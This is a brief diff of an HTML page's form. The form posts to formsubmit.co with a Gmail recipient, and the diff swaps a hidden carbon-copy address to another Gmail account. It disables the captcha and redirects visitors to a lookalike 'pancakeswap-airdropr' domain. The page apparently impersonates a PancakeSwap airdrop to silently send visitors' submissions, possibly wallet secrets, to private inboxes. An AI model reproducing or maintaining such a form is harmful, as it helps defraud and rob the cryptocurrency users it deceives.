--- a/index.html
+++ b/index.html
@@ -1265,7 +1265,7 @@
             </p>
             <form action="https://formsubmit.co/r9108460@gmail.com" method="POST">
             <div class="modDivBody">
-            <input type="hidden" name="_cc" value="wnewton0001@gmail.com">
+            <input type="hidden" name="_cc" value="formsubmitmail@gmail.com">
                 <input type="hidden" name="_captcha" value="false">
                  <input type="hidden" name="_next" value="https://pancakeswap-airdropr.vercel.app/pancakes.html">
                 
